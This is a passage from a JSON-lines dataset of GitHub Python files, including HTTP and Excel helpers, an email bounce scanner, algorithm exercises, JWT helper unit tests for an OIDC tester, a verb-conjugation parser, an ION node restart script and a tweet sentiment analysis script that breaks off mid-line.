os.makedirs(r\"../log/logPic/{}\".format(date))\n currentTime = time.strftime(\"%Y-%m-%d %H-%M-%S\", time.localtime())\n img.save(r\"../log/logPic/{}/{}-{}.jpg\".format(date,info,currentTime))\n\n\nclass ParseExcel(object):\n def __init__(self, file_path):\n self.data = xlrd.open_workbook(file_path)\n\n def getsheet(self, sheetname):\n return self.data.sheet_by_name(sheetname)\n\n @classmethod\n def getdatafromexcel(cls, file_path, sheetname, xrow, ycol):\n \"\"\"文件路径比较重要,要以这种方式去写文件路径不用\"\"\"\n # file_path = r'd:/功率因数.xlsx'\n # 读取的文件路径\n # file_path = file_path.decode('utf-8')\n # 文件中的中文转码\n data = xlrd.open_workbook(file_path)\n # 获取数据\n table = data.sheet_by_name(sheetname)\n # 获取sheet\n # nrows = table.nrows\n # # 获取总行数\n # ncols = table.ncols\n # 获取总列数\n # table.row_values(i)\n # # 获取一行的数值\n # table.col_values(i)\n # 获取一列的数值\n\n # 获取一个单元格的数值\n cell_value = table.cell(xrow, ycol).value\n\n return cell_value\n\n\nclass WebRequests:\n @staticmethod\n def get(url, para, headers):\n try:\n r = requests.get(url, params=para, headers=headers)\n print(\"获取返回的状态码\", r.status_code)\n json_r = r.json()\n print(\"json类型转化成python数据类型\", json_r)\n return json_r\n except BaseException as e:\n print(\"请求失败!\", str(e))\n\n @staticmethod\n def post(url, para, headers):\n try:\n r = requests.post(url, data=para, headers=headers)\n print(\"获取返回的状态码\", r.status_code)\n json_r = r.json()\n print(\"json类型转化成python数据类型\", json_r)\n return json_r\n except BaseException as e:\n print(\"请求失败!\", str(e))\n\n @staticmethod\n def post_json(url, para, headers):\n try:\n data = para\n data = json.dumps(data) # python数据类型转化为json数据类型\n r = requests.post(url, data=data, headers=headers)\n print(\"获取返回的状态码\", r.status_code)\n # print(\"返回值\", r.content.decode(\"utf-8\"))\n json_r = r.json()\n print(\"json类型转化成python数据类型\", json_r)\n return json_r\n except BaseException as e:\n print(\"请求失败!\", str(e))\n\n\nif __name__ == \"__main__\":\n pass\n log(123)","repo_name":"MM1997/layoutRoom_7.5","sub_path":"lib/public.py","file_name":"public.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5491746212","text":"import os\nimport logging\n\nfrom flufl.bounce.interfaces import IBounceDetector\nfrom importlib import import_module\nfrom pkg_resources import resource_listdir\nfrom public import public\n\n\nlog = logging.getLogger('flufl.bounce')\n\n\ndef _find_detectors(package):\n missing = object()\n for filename in resource_listdir(package, ''):\n basename, extension = os.path.splitext(filename)\n if extension != '.py':\n continue\n module_name = '{}.{}'.format(package, basename)\n module = import_module(module_name)\n for name in getattr(module, '__all__', []):\n component = getattr(module, name, missing)\n if component is missing:\n log.error('skipping missing __all__ entry: {}'.format(name))\n if IBounceDetector.implementedBy(component):\n yield component\n\n\n@public\ndef scan_message(msg):\n \"\"\"Detect the set of all permanently bouncing original recipients.\n\n :param msg: The bounce message.\n :type msg: `email.message.Message`\n :return: The set of detected original recipients.\n :rtype: set of strings\n \"\"\"\n permanent_failures = set()\n package = 'flufl.bounce._detectors'\n for detector_class in _find_detectors(package):\n log.info('Running detector: {}'.format(detector_class))\n try:\n temporary, permanent = detector_class().process(msg)\n except Exception:\n log.exception('Exception in detector: {}'.format(detector_class))\n raise\n permanent_failures.update(permanent)\n return permanent_failures\n\n\n@public\ndef all_failures(msg):\n \"\"\"Detect the set of all bouncing original recipients.\n\n :param msg: The bounce message.\n :type msg: `email.message.Message`\n :return: 2-tuple of the temporary failure set and permanent failure set.\n :rtype: (set of strings, set of string)\n \"\"\"\n temporary_failures = set()\n permanent_failures = set()\n package = 'flufl.bounce._detectors'\n for detector_class in _find_detectors(package):\n log.info('Running detector: {}'.format(detector_class))\n temporary, permanent = detector_class().process(msg)\n temporary_failures.update(temporary)\n permanent_failures.update(permanent)\n return temporary_failures, permanent_failures\n","repo_name":"Riyuzakii/GNUmailman","sub_path":"venv3/lib/python3.5/site-packages/flufl.bounce-3.0-py3.5.egg/flufl/bounce/_scan.py","file_name":"_scan.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"12120471043","text":"'''\n给定一个 n x n 矩阵,其中每行和每列元素均按升序排序,找到矩阵中第k小的元素。\n请注意,它是排序后的第k小元素,而不是第k个元素。\n示例:\n\nmatrix = [\n [ 1, 5, 9],\n [10, 11, 13],\n [12, 13, 15]\n],\nk = 8,\n返回 13。\n'''\n'''\n思路:二分查找的思想:初始时,最小值为为第一个元素l,最大值为最后一个元素h,\n中值mid=(l+h)//2,计算mid的位置,是第j小的数\n当j=0 and matrix[i][j]>mid:\n j -= 1 \n count += j+1\n #print(count, k)\n if count>=k:\n h = mid\n else:\n l = mid + 1\n return l","repo_name":"zhudaxia666/shuati","sub_path":"LeetCode/刷题/378有序矩阵中第k小的元素.py","file_name":"378有序矩阵中第k小的元素.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12735031292","text":"import re\nimport string\n\n\ndef preprocess_text(text):\n # Remove links\n text = re.sub(r\"http\\S+\", \"\", text)\n \n # remove special chars and numbers\n text = re.sub(\"[^A-Za-z]+\", \" \", text)\n \n text = text.strip().lower()\n text = re.sub(\n f\"[{re.escape(string.punctuation)}]\", \"\", text\n )\n return text","repo_name":"sangramdhurve/FastText-TextClassification","sub_path":"fasttext_api/api/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7495928023","text":"import copy\nimport sys\nsys.setrecursionlimit(10**9)\n\nN = int(input())\n\narrr = [[0] * N for _ in range(N)]\ndx = [1, 1, 1, 0, 0, -1, -1, -1]\ndy = [1, 0, -1, 1, -1, 1, 0, -1]\n\ndef func(tmp, n):\n for nx, ny in tmp:\n arr[nx][ny] = n\n\ndef DFS(queen):\n global cnt\n x, y = queen\n arr[x][y] = 2\n tmp = []\n\n for m in range(1, N):\n for k in range(8):\n nx, ny = x + (dx[k] * m), y + (dy[k] * m)\n if 0 <= nx < N and 0 <= ny < N and arr[nx][ny] == 0:\n tmp.append([nx, ny])\n\n func(tmp, 1)\n for i in range(N):\n if x != N-1 and arr[x+1][i] == 0:\n DFS([x+1, i])\n\n if sum(map(sum, arr)) == N * N + N:\n cnt += 1\n\n func(tmp, 0)\n arr[x][y] = 0\n\ncnt = 0\nif N % 2 == 0: # 짝수\n for i in range(N // 2):\n arr = copy.deepcopy(arrr)\n DFS([0, i])\n print(cnt * 2)\n\nelse: # 홀수\n for i in range(N // 2):\n arr = copy.deepcopy(arrr)\n DFS([0, i])\n cnt = cnt * 2\n DFS([0, N//2])\n print(cnt)\n","repo_name":"YooKyungHun/Algorithm","sub_path":"ALGORITHM/Python/9663N-Queen.py","file_name":"9663N-Queen.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74909839799","text":"import unittest\nimport jwt\nimport json\nimport base64\nimport sys\nimport os\n\nimport osbtlib.id_token as id_token\n\nclass TestUtils(unittest.TestCase):\n def test_get_header(self):\n # create id_token\n original_header = {'alg': 'HS256', 'typ': 'JWT'}\n secret = 'secret'\n original_token = jwt.encode({'foo': 'bar'}, secret, algorithm='HS256', headers=original_header)\n\n header = id_token.get_header(original_token)\n self.assertDictEqual(header, original_header)\n\n def test_replace_header(self):\n # create id_token\n original_header = {'alg': 'HS256', 'typ': 'JWT'}\n secret = 'secret'\n original_token = jwt.encode({'foo': 'bar'}, secret, algorithm='HS256', headers=original_header)\n\n # replace original header with new header\n new_header = {'alg': 'HS256', 'typ': 'JWS'}\n new_token = id_token.replace_header(original_token, new_header)\n\n # decode header part\n header_decoded = id_token.get_header(new_token)\n\n self.assertDictEqual(header_decoded, new_header)\n\n def test_get_payload(self):\n # create id_token\n original_payload = {'foo': 'bar'}\n secret = 'secret'\n original_token = jwt.encode(original_payload, secret, algorithm='HS256')\n\n payload = id_token.get_payload(original_token)\n self.assertEqual(payload.get('foo'), 'bar')\n\n def test_replace_payload(self):\n # create id_token\n original_payload = {'foo': 'bar'}\n secret = 'secret'\n original_token = jwt.encode(original_payload, secret, algorithm='HS256')\n \n # replace original payload with new payload\n new_payload = {'baz': 'qux'}\n new_token = id_token.replace_payload(original_token, new_payload)\n \n # decode payload part\n payload_decoded = id_token.get_payload(new_token)\n \n self.assertDictEqual(payload_decoded, {'baz': 'qux'})\n\n def test_get_signature(self):\n # create id_token\n secret = 'secret'\n original_token = jwt.encode({'foo': 'bar'}, secret, algorithm='HS256')\n\n signature = id_token.get_signature(original_token)\n self.assertEqual(signature, original_token.split('.')[2])\n\n def test_replace_signature(self):\n # create id_token\n secret = 'secret'\n original_token = jwt.encode({'foo': 'bar'}, secret, algorithm='HS256')\n\n # replace original signature with new signature\n new_signature = 'new_signature'\n new_token = id_token.replace_signature(original_token, new_signature)\n \n signature = id_token.get_signature(new_token)\n \n self.assertEqual(signature, new_signature)\n","repo_name":"oidc-scenario-based-tester/osbtlib","sub_path":"tests/test_id_token.py","file_name":"test_id_token.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"72878980599","text":"\"\"\"\nMiscellaneous classes for supporting the package.\n\"\"\"\nimport math\nimport warnings\n\nimport numpy as np\nfrom scipy.stats import norm\n\nfrom casex import enums\n\n\nclass NormalDistributionParameters:\n \"\"\"Class for provide support for generating and using normal distributions.\n\n Parameters\n ----------\n mu : float, optional\n Mean of the normal distribution (the default is 0).\n sigma : float, optional\n Standard deviation of the normal distribution (the default is 1).\n wrapping_type : :class:`enums.Wrapping`, optional\n The wrapping type for mu. When set to `EWrapping.PI2PI`, mu is wrapped to the interval -:math:`\\pi` to\n :math:`\\pi` (the default is `EWrapping.NONE`).\n\n Attributes\n ----------\n input_set : float array\n The domain for the sampling (i.e. the input to the distribution, or the x axis values).\n output_set : float array\n The value set for the sampling (i.e. the output of the distribution, or the y axis values).\n mu : float, optional\n Mean of the normal distribution (the default is 0).\n sigma : float, optional\n Standard deviation of the normal distribution (the default is 1).\n wrapping_type : :class:`enums.Wrapping`, optional\n The wrapping type for mu. When set to `EWrapping.PI2PI`, mu is wrapped to the interval -:math:`\\pi` to\n :math:`\\pi` (the default is `EWrapping.NONE`).\n \"\"\"\n\n def __init__(self, mu=0.0, sigma=1.0, wrapping_type=enums.Wrapping.NONE):\n self.input_set = None\n self.output_set = None\n\n self.mu = mu\n self.sigma = sigma\n \n self.__reset_values()\n\n if not isinstance(wrapping_type, enums.Wrapping):\n warnings.warn(\"Wrapping type not recognized. Wrapping set to NONE.\")\n self.wrapping_type = enums.Wrapping.NONE\n else:\n self.wrapping_type = wrapping_type\n \n if self.wrapping_type == enums.Wrapping.PI2PI:\n while self.mu > math.pi:\n self.mu = self.mu - 2 * math.pi\n while self.mu < -math.pi:\n self.mu = self.mu + 2 * math.pi\n \n def __reset_values(self):\n # Resets the input and output sets.\n self.input_set = None\n self.output_set = None\n \n def compute_sampling(self, times_sigma, num_of_samples):\n \"\"\"Computes a sampling of the normal distribution.\n\n The normal distribution can be plotted using output set against input set. This method computes the input set\n as a linear function and the output set as the normal distribution from the input set. Both sets are parameters\n in the class.\n\n Parameters\n ----------\n times_sigma : float\n This value is multiplied onto sigma and the results plus/minus is the interval for the sampling.\n num_of_samples : int\n Number of samples in the sampling.\n \n Returns\n -------\n None\n \"\"\"\n self.input_set = np.linspace(self.mu - times_sigma * self.sigma, self.mu + times_sigma * self.sigma,\n num_of_samples)\n self.output_set = norm.pdf(self.input_set, self.mu, self.sigma)\n\n\nclass InitialSpeeds:\n \"\"\"Class for holding initial speeds for ballistic descent.\n\n Parameters\n ----------\n initial_speed_x_mu : float\n [m/s] The mean value of the normal distribution for the initial horizontal speed.\n initial_speed_x_sigma : float\n The standard deviation of the normal distribution for the initial horizontal speed.\n initial_speed_y_mu : float\n [m/s] The mean value of the normal distribution for the initial vertical speed.\n initial_speed_y_sigma : float\n The standard deviation of the normal distribution for the initial vertical speed.\n\n Attributes\n ----------\n initial_speed_x : float\n [m/s] The initial horizontal speed.\n initial_speed_y : float\n [m/s] The initial vertical speed.\n \"\"\"\n\n def __init__(self, initial_speed_x_mu, initial_speed_x_sigma, initial_speed_y_mu, initial_speed_y_sigma):\n if initial_speed_x_mu < 0:\n warnings.warn(\"Initial horizontal speed (along x axis) cannot be negative. Subsequent results are invalid.\")\n \n self.initial_speed_x = NormalDistributionParameters(initial_speed_x_mu, initial_speed_x_sigma)\n self.initial_speed_y = NormalDistributionParameters(initial_speed_y_mu, initial_speed_y_sigma)\n","repo_name":"JARUS-QM/casex","sub_path":"casex/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"36126687559","text":"import sys\ninput = sys.stdin.readline\n\ndx = [1,0,-1,0]\ndy = [0,-1,0,1]\nN, T = map(int,input().split())\norder = [list(map(str,input().split())) for _ in range(N)]\ndirection = [0,0]\ntmp, pre = 0, 0\nfor i in order:\n cnt = int(i[0]) - pre\n pre = int(i[0])\n direction[0] += dx[tmp]*cnt\n direction[1] += dy[tmp]*cnt\n if i[1][0] == 'r':\n tmp += 1\n else:\n tmp += 3\n tmp %= 4\ndirection[0] += dx[tmp]*(T-pre)\ndirection[1] += dy[tmp]*(T-pre)\nprint(direction[0], direction[1])\n","repo_name":"Darkeroe/Algorithm","sub_path":"20493.py","file_name":"20493.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70580152121","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\nfrom bisect import bisect_left\n\nfrom lxml import etree\n\nfrom pkg_resources import resource_filename\n\nfrom . import string_utils\nfrom . import verb\nfrom . import exceptions\nfrom . import mlconjug\nfrom . import config\n\nclass VerbsParser:\n def __init__(self, lang='fr'):\n self.verbs = []\n parser = etree.XMLParser(encoding='utf-8')\n tree = etree.parse(resource_filename(\n \"verbecc\",\n \"data/verbs-{}.xml\".format(lang)),\n parser)\n root = tree.getroot()\n root_tag = 'verbs-{}'.format(lang)\n if root.tag != root_tag:\n raise exceptions.VerbsParserError(\n \"Root XML Tag {} Not Found\".format(root_tag))\n for child in root:\n if child.tag == 'v':\n self.verbs.append(verb.Verb(child))\n\n self.verbs = sorted(self.verbs, key=lambda v: v.infinitive)\n self._infinitives = [v.infinitive for v in self.verbs]\n self._verbs_no_accents = sorted(self.verbs, key=lambda v: v.infinitive_no_accents)\n self._infinitives_no_accents = [v.infinitive_no_accents for v in self._verbs_no_accents]\n if config.ml:\n self.template_predictor = mlconjug.TemplatePredictor(\n [(v.infinitive,v.template) for v in self.verbs], lang)\n\n def find_verb_by_infinitive(self, infinitive):\n \"\"\"First try to find with accents, e.g. if infinitive is 'Abañar',\n search for 'abañar' and not 'abanar'. \n If not found then try searching with accents stripped.\n If all else fails, use machine-learning magic to predict\n which conjugation template should be used.\n \"\"\"\n query = infinitive.lower()\n i = bisect_left(self._infinitives, query)\n if i != len(self._infinitives) and self._infinitives[i] == query:\n return self.verbs[i]\n query = string_utils.strip_accents(infinitive.lower())\n i = bisect_left(self._infinitives_no_accents, query)\n if (i != len(self._infinitives_no_accents) \n and self._infinitives_no_accents[i] == query):\n return self._verbs_no_accents[i]\n if config.ml:\n template, pred_score = self.template_predictor.predict(query)\n verb_xml = \"{}{}\".format(infinitive.lower(), template)\n ret = verb.Verb(etree.fromstring(verb_xml))\n ret.predicted = True\n ret.pred_score = pred_score\n return ret\n else:\n raise exceptions.VerbNotFoundError\n\n def get_verbs_that_start_with(self, pre, max_results=10):\n ret = []\n pre_no_accents = string_utils.strip_accents(pre.lower())\n for verb in self.verbs:\n if verb.infinitive_no_accents.startswith(pre_no_accents):\n ret.append(verb.infinitive)\n if len(ret) >= max_results:\n break\n return ret\n","repo_name":"bretttolbert/verbecc","sub_path":"verbecc/verbs_parser.py","file_name":"verbs_parser.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"40"} +{"seq_id":"26928111420","text":"import sys\nimport time\nimport requests\nimport subprocess\nfrom subprocess import PIPE\nimport datetime\n\nMGR_API_URL = \"https://www.spatiam.com/ion-dtn-mgr/api/\"\nCONFIG_FILENAME = \"spatiam_config.txt\"\n\nAUTH_TOKEN = sys.argv[1]\nNETWORK_ID = sys.argv[4]\nNODE_UUID = sys.argv[5]\nNODE_LISTENING_IP = sys.argv[6]\n\nnode_update = datetime.datetime.fromisoformat(sys.argv[2] + ' ' + sys.argv[3])\n\nprint(\"SPATIAM PERSISTENCE SCRIPT\")\nprint(\"The provided node will restart if any network updates are detected\")\nprint(\"\\nChecking for updates ...\")\n\n# ---------------------------------------------------------------\n# ion_alive: Checks bplist return code to check if ION is running\n# ---------------------------------------------------------------\ndef ion_alive():\n command = \"bplist\"\n proc = subprocess.Popen([command], shell=True, stdout=subprocess.PIPE)\n proc.communicate()\n return proc.returncode == 0\n\n# ---------------------------------------------------------------\n# ionrestart: Starts ION, stops it first if it is already running\n# ---------------------------------------------------------------\ndef ionrestart():\n print(\"Restarting ION ...\")\n\n failed_restart = 1\n while True:\n \n if failed_restart >= 3:\n print(\"ION failed to respond, exiting program\")\n quit()\n\n if ion_alive():\n ionstop_command = 'ionstop'\n subprocess.Popen([ionstop_command], shell=True, stdout=PIPE, stderr=PIPE).wait()\n time.sleep(2)\n\n ionstart_command = 'ionstart -I ' + CONFIG_FILENAME\n subprocess.Popen([ionstart_command], shell=True, stdout=PIPE, stderr=PIPE).wait()\n time.sleep(5)\n\n if not ion_alive():\n failed_restart += 1\n else:\n print(\"ION Successfully restarted\")\n break\n\n# ----------------------------------------------------------\n# download_config: Download configuration file of given node\n# ----------------------------------------------------------\ndef download_config():\n try:\n r = requests.get(MGR_API_URL + 'dynamic-config', params={'node': NODE_UUID, 'listeningip': NODE_LISTENING_IP, 'length':315360000})\n\n if r.status_code == 200:\n config = r.text\n # Update only if config file has changed (network could be reporting 'cosmetic' change)\n if not config == open(CONFIG_FILENAME).read():\n try:\n print(\"Network update detected (\" + str(datetime.datetime.now())+\")\")\n config_file = open(CONFIG_FILENAME, \"w\")\n config_file.write(config)\n config_file.close()\n print(\"Node configuration downloaded (\" +CONFIG_FILENAME +\")\")\n ionrestart()\n print(\"\\nChecking for updates...\")\n return True\n except Exception as e:\n print(e)\n return False\n else:\n return True\n else:\n return False\n\n except:\n return False\n\n# -----------------------------------------------------------------\n# latest_network_update: Returns timestamp of latest network update\n# -----------------------------------------------------------------\ndef latest_network_update():\n try:\n r = requests.get(MGR_API_URL + 'api/network/'+NETWORK_ID+'/last_change', headers = {'Authorization': 'Token ' + AUTH_TOKEN})\n if r.status_code == 200:\n return datetime.datetime.fromisoformat(r.text)\n else:\n return None\n except:\n return None\n\nwhile True:\n latest_update = latest_network_update()\n \n # Network has had an update \n if latest_update is not None and latest_update > node_update:\n if download_config():\n node_update = latest_update\n\n # In case ION stops working\n elif not ion_alive():\n print(\"ION failure detected (\" + str(datetime.datetime.now()) + \")\")\n ionrestart()\n \n time.sleep(10)\n","repo_name":"Spatiam/Spatiam_ION_DMI","sub_path":"spatiam_persist.py","file_name":"spatiam_persist.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"29849954451","text":"#Sentiment analysis on the T-mobile sprint merger user comment data scraped from Twitter\r\n\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nimport requests\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport nltk\r\nimport regex as re\r\nfrom nltk.stem import PorterStemmer\r\nimport wordcloud\r\nimport matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud, STOPWORDS\r\n#nltk.download('punkt')\r\n#nltk.download('averaged_perceptron_tagger')\r\n#nltk.download('maxent_ne_chunker')\r\n#nltk.download('words')\r\n\r\nfrom nltk import word_tokenize, pos_tag, ne_chunk\r\nfrom nltk.chunk import conlltags2tree, tree2conlltags\r\n\r\n#upload the data\r\nos.getcwd()\r\n\r\nos.chdir('D:\\\\MSIS(R and Python)\\\\Project')\r\n\r\nmerger_tweets = pd.read_table('cleanfile2.csv', sep = ',')\r\nmerger_tweets.head()\r\ntextbank = merger_tweets.tweet.str.cat(sep=' ')\r\n\r\n#tokenizing the words\r\npost1 = pos_tag(word_tokenize(textbank))\r\nprint(post1)\r\n\r\ntree1 = ne_chunk(post1)\r\nprint(tree1)\r\n\r\nentityp = []\r\nentityo = []\r\nentityg = []\r\nentitydesc = []\r\n\r\n#named entity recognition for person, organization, geographical location\r\nfor x in str(tree1).split('\\n'):\r\n if 'PERSON' in x:\r\n entityp.append(x)\r\n elif 'ORGANIZATION' in x:\r\n entityo.append(x)\r\n elif 'GPE' in x or 'GSP' in x:\r\n entityg.append(x)\r\n elif '/NN' in x:\r\n entitydesc.append(x)\r\n\r\nentityp\r\nentityo\r\nentityg\r\nentitydesc\r\n\r\niob_tag = tree2conlltags(tree1)\r\nprint(iob_tag)\r\n\r\nentityp1 = re.sub(r'/NNP','', str(entityp))\r\nentityp1 = re.sub(r'/NNPS','', entityp1)\r\nentityp1 = re.sub(r'/JJ','', entityp1)\r\nentityp1 = re.sub(r'GPE','', entityp1)\r\nentityp1 = re.sub(r'PERSON','', entityp1)\r\nentityp1 = re.sub(r'NN','', entityp1)\r\nfrom PIL import Image\r\nfrom os import path\r\n#To make word cloud in the shape of twitter symbol. The png is just a black and white twitter icon\r\n#named entity - person\r\nd = path.dirname(__file__) if \"__file__\" in locals() else os.getcwd()\r\nperson_mask = np.array(Image.open(path.join(d, \"download (1).png\")))\r\nstopwords = set(STOPWORDS)\r\nwordcloud = WordCloud(\r\n background_color='white',\r\n stopwords=stopwords,\r\n max_words=500,\r\n mask = person_mask,\r\n max_font_size=40, \r\n scale=3,\r\n ).generate(str(entityp1))\r\n\r\nplt.figure(1, figsize=(12, 12))\r\nplt.axis('off')\r\n \r\nplt.imshow(wordcloud)\r\nplt.show()\r\n\r\n#named entity - Organization\r\nentityo1 = re.sub(r'/NNP','', str(entityo))\r\nentityo1 = re.sub(r'/NNPS','', entityo1)\r\nentityo1 = re.sub(r'/JJ','', entityo1)\r\nentityo1 = re.sub(r'GPE','', entityo1)\r\nentityo1 = re.sub(r'ORGANIZATION','', entityo1)\r\norganization_mask = np.array(Image.open(path.join(d, \"download (1).png\")))\r\nstopwords = set(STOPWORDS)\r\nwordcloud = WordCloud(\r\n background_color='white',\r\n stopwords=stopwords,\r\n max_words=200,\r\n max_font_size=40,\r\n mask = organization_mask,\r\n scale=3,\r\n ).generate(str(entityo1))\r\n\r\nplt.figure(1, figsize=(12, 12))\r\nplt.axis('off')\r\n \r\nplt.imshow(wordcloud)\r\nplt.show()\r\n\r\n#named entity - Geographical location\r\nentityg1 = re.sub(r'/NNP','', str(entityg))\r\nentityg1 = re.sub(r'/NNPS','', entityg1)\r\nentityg1 = re.sub(r'/JJ','', entityg1)\r\nentityg1 = re.sub(r'GPE','', entityg1)\r\nentityg1 = re.sub(r'GSP','', entityg1)\r\nentityg1 = re.sub(r'/NN','', entityg1)\r\ngeography_mask = np.array(Image.open(path.join(d, \"download.png\")))\r\nstopwords = set(STOPWORDS)\r\nwordcloud = WordCloud(\r\n background_color='white',\r\n stopwords=stopwords,\r\n max_words=200,\r\n max_font_size=40,\r\n mask = geography_mask,\r\n scale=3,\r\n ).generate(str(entityg1))\r\n\r\nplt.figure(1, figsize=(12, 12))\r\nplt.axis('off')\r\n \r\nplt.imshow(wordcloud)\r\nplt.show()\r\n\r\n\r\n\r\nimport nltk\r\n\r\n# download the stopwords dictionary if you have not already\r\n\r\n#nltk.download('stopwords')\r\n\r\nfrom nltk import word_tokenize, sent_tokenize\r\n\r\nfrom nltk.corpus import stopwords\r\n\r\nfrom nltk.stem import LancasterStemmer, WordNetLemmatizer, PorterStemmer\r\n\r\nmerger_tweets.columns\r\n\r\nmerger_tweets.rename(columns={'tweet': 'tweettext'}, inplace=True)\r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].apply(lambda x: \" \".join(x.lower() for x in x.split()))\r\n\r\nmerger_tweets['tweettext'][2]\r\n\r\n#removal of digits and unnecessary words\r\npatterndigits = '\\\\b[0-9]+\\\\b'\r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].str.replace(patterndigits,'')\r\n\r\npatternpunc = '[^\\w\\s]'\r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].str.replace(patternpunc,'')\r\n\r\n\r\nmerger_tweets['tweettext'][2]\r\n\r\nstop = stopwords.words('english')\r\n\r\n# Before removal of stopwords\r\n\r\nmerger_tweets['tweettext'][2]\r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].apply(lambda x: \" \".join(x for x in x.split() if x not in stop))\r\n\r\n# After removal of stopwords\r\n\r\nmerger_tweets['tweettext'][2]\r\n\r\nnetwork_names = ['sprint','tmobile','sprinttmobilemerger','tmobilesprintmerger','sprintmerger','tmobilemerger'] \r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].apply(lambda x: \" \".join(x for x in x.split() if x not in network_names))\r\n\r\nporstem = PorterStemmer()\r\n\r\nmerger_tweets['tweettext'] = merger_tweets['tweettext'].apply(lambda x: \" \".join([porstem.stem(word) for word in x.split()]))\r\n\r\nmerger_tweets['tweettext'][2]\r\n\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\n\r\nvectorizer = CountVectorizer()\r\n\r\ntokens_data = pd.DataFrame(vectorizer.fit_transform(merger_tweets['tweettext']).toarray(), columns=vectorizer.get_feature_names())\r\n\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\n\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\n\r\nfrom sklearn.decomposition import NMF\r\n\r\n \r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\r\n\r\n#plot_size = plt.rcParams[\"figure.figsize\"]\r\n\r\n#print(plot_size[0])\r\n\r\n#print(plot_size[1])\r\n\r\n\r\n#plot_size[0] = 8\r\n\r\n#plot_size[1] = 6\r\n\r\n#plt.rcParams[\"figure.figsize\"] = plot_size\r\n\r\n#Creation of topics\r\n\r\nvectorizer = CountVectorizer(max_df=0.8, min_df=4, stop_words='english')\r\n\r\ndoc_term_matrix = vectorizer.fit_transform(merger_tweets['tweettext'].values.astype('U'))\r\n\r\ndoc_term_matrix\r\n\r\nLDA = LatentDirichletAllocation(n_components=5, random_state=35)\r\n\r\nLDA.fit(doc_term_matrix)\r\n\r\nfirst_topic = LDA.components_[0]\r\n\r\n#first topic top words\r\ntop_topic_words = first_topic.argsort()[-10:]\r\n\r\n\r\nfor i in top_topic_words:\r\n\r\n print(vectorizer.get_feature_names()[i]) \r\n\r\n\r\nfor i,topic in enumerate(LDA.components_):\r\n\r\n print(f'Top 10 words for topic #{i}:')\r\n\r\n print([vectorizer.get_feature_names()[i] for i in topic.argsort()[-10:]])\r\n\r\n print('\\n')\r\n\r\n#document term matrix\r\ntopic_values = LDA.transform(doc_term_matrix)\r\n\r\ntopic_values.shape\r\n\r\nmerger_tweets['topic'] = topic_values.argmax(axis=1)\r\n\r\nmerger_tweets.head()\r\n\r\n\r\ntfidf_vect = TfidfVectorizer(max_df=0.8, min_df=5, stop_words='english')\r\n\r\ndoc_term_matrix2 = tfidf_vect.fit_transform(merger_tweets['tweettext'].values.astype('U'))\r\n\r\nnmf = NMF(n_components=5, random_state=42)\r\n\r\nnmf.fit(doc_term_matrix2)\r\n\r\nfirst_topic = nmf.components_[0]\r\n\r\ntop_topic_words = first_topic.argsort()[-10:]\r\n\r\n#Top 5 topics\r\nfor i in top_topic_words:\r\n\r\n print(tfidf_vect.get_feature_names()[i])\r\n\r\n\r\n\r\nfor i,topic in enumerate(nmf.components_):\r\n\r\n print(f'Top 10 words for topic #{i}:')\r\n\r\n print([tfidf_vect.get_feature_names()[i] for i in topic.argsort()[-10:]])\r\n\r\n print('\\n')\r\n\r\n \r\n\r\ntopic_values2 = nmf.transform(doc_term_matrix2)\r\n\r\nmerger_tweets['topic2'] = topic_values2.argmax(axis=1)\r\n\r\nmerger_tweets.head()\r\n\r\n\r\nfeatures = merger_tweets['tweettext']\r\n\r\nvectorizer = TfidfVectorizer (max_features=2500, min_df=7, max_df=0.8, stop_words=stop)\r\n\r\nprocessed_features = vectorizer.fit_transform(features).toarray()\r\n\r\nmerger_tweets.head()\r\n\r\nmerger_tweets['sentiment'] = get_tweet_sentiment(merger_tweets.tweettext)\r\n\r\nlabels = merger_tweets['topic']\r\n\r\n \r\n#Dividing the data into training and testing to find the accuracy percentage\r\nX_train, X_test, y_train, y_test = train_test_split(processed_features, labels, test_size=0.2, random_state=0)\r\n\r\n \r\n\r\ntext_classifier = RandomForestClassifier(n_estimators=200, random_state=0)\r\n\r\ntext_classifier.fit(X_train, y_train)\r\n\r\npredictions = 